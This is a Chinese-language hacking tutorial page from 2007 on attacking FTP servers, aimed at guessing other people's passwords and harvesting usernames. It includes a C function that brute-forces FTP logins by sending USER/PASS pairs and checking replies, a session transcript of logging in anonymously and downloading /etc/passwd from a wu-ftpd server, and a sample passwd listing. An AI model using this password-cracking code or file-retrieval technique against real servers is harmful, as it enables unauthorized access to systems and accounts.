Ftp的攻击

日期：2007年7月12日作者：查看:[大字体中字体小字体]

　　FTP的攻击无非就是对用户的猜解和对的ftp服务器的溢出！那我们来熟悉一下你几乎很熟悉的知识！对用户密码的猜解，我看几乎每个扫描器都有这个功能。一直用别人的工具真的有点不好意思，有点寄人篱下的感觉，不知道大家有没有呢！还有的就是，你对如何扫到密码和用户的过程了解吗？其实不难的！当你在命令行中用ftp命令连接某个ftp服务器的时候，其实也可以用那个来猜密码的就是，手动的，那样的作法太慢了，所以就要自己写点东西来加快进程！
D:>ftp
ftp>open 192.168.25.1
Connected to 192.168.25.1.
220 chi-1 Microsoft FTP Service (Version 5.0）
User (192.168.25.1none)):anonymous
331 Anonymous Access allowed, send identity (e-mail name) as passWord.
password: (看不到的）
530 User 111@ connot log in.
Login failed
上面的是一个ftp的登陆过程，其实真正的登陆过程是ftp发给ftp服务器USER anonymous, 然后就会返回个辨认值，比如说上面的331，只后就会等待你输入PASS xxxxx，如何成功就会登陆，不然就要重试。
/**************************************************************/
......................
int ftp_crack(char *username,char *password,int sock) /* sock 是用socket建立的ftp连接*/
{
char *buffer = malloc(1024);
recv(sock,buffer,1024,0);
bzero(buffer,1024);
sprintf(buffer,"USER %s\n",username); /* 把USER 写入buffer */
send(sock, buffer,strlen(buffer),0); /* 用send来发送 */
printf("Try username %s \n",username);
recv(sock, buffer, 1024, 0);
bzero(buffer,1024);
sprintf(buffer,"PASS %s\n",password);
send(sock,buffer,strlen(buffer),0); /* 发送PASS */
recv(sock, buffer,1024, 0);
printf("Reply : %s \n",buffer);
if((strstr(buffer,"incorrect")) == NULL) { /* 判断是否正确 "incorrect"可改成别的，比如windows ftp server的failt" */
printf("\nFound the password %s for user %s\n",password,username);
}

..................
/***************************************************************/
上面的是代码中的一段，[全的代码] 对密码的判断就可以自动了！
现在网上还很流行的就是很多ftp都可以用anonymous或guest来登陆的，本来没有什么的，不过还是可以利用的啦，比如你可以用cwd命来判断用户，还有的ftp服务器，由于没有了字节的处理，比如..../.../等，就可以下载passwd.
D:>ftp
ftp> open 192.168.25.3
Connect to 192.168.25.3
220 chi FTP server (version wu-2.6.2.5) ready.
User (192.168.25.3none)): anonymous
3331 Guest loin ok, send you complete e-mail address as password.
Password: (我写了anonymous，就上了）
230-The response anonymous is not valid
230-Next time please use your e-mail address as your password
230- for example: joe@192.168.25.1
230 Guest login ok, access restriction apply.
ftp>cd /etc
250 CWD command sUCcessful.
ftp>ls
200 PORT command successful.
550 Bad Directory components
ftp>get passwd
200 PORT command successful.
150 Opening ASCII mode data connection for passwd (79 bytes).
226 Transfer complete.
ftp: 84 bytes received in 0.00Second 84000.00Kbytes/sec.
ftp>
在的自己的电脑上的目录下就会找到passwd文件用文本打开就可以了，大多数的是如下的
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1wner of many system processes:/root:/nonexistent
operator:*:2:20ystem &:/usr/guest/operator:/bin/csh
bin:*:3:7:Binaries Commands and Source,,,:/:/nonexistent
games:*:7:13:Games pseudo-user:/usr/games:/nonexistent
news:*:8:8:News Subsystem:/:/nonexistent
man:*:9:9:Mister Man Pages:/usr/share/man:/nonexistent
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
xten:*:67:67:X-10 daemon:/usr/local/xten:/nonexistent
pop:*:68:6ost Office Owner:/nonexistent:/nonexistent
ftp:*:999:999:anonymous ftp account:/home/ftp:/bin/csh
nobody:*:65534:65534:Unprivileged user:/nonexistent:/nonexistent
joe:*:1001:1001:User &:/home/joe:/bin/csh
norm:*:1000:1000:Norman Rossman:/home/norm:/bin/csh
khan:*:1008:1008:RobRose Net, khans.com, Robert Jenkins:/home/khan:/bin/csh
robrose:*:1056:1056:Robert Jenkins, robrose.com:/home/robrose:/bin/csh
secret:*:1002:1002ecretoflife.com:/home/secret:/bin/csh
是shadow过的，不过不重要的，毕竟这种的机子不多了，最少我们也知道对方的用户名了！还有种得到用户名的方法就是用cwd命令，不过这个方法没有多大的可行性！
[1] [2] [3] [4] 下一页
Ftp的攻击相关文章：
·Ftp的攻击
Ftp的攻击相关软件

上一篇:如何在防火墙后面设置后门

下一篇:在ASP中实现页面与数据库连接的几种实用方法

特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作
者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转
载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源：http://www.hackhome.com

精品推荐

热点TOP10

特别推荐

·FTP协议的分析和扩展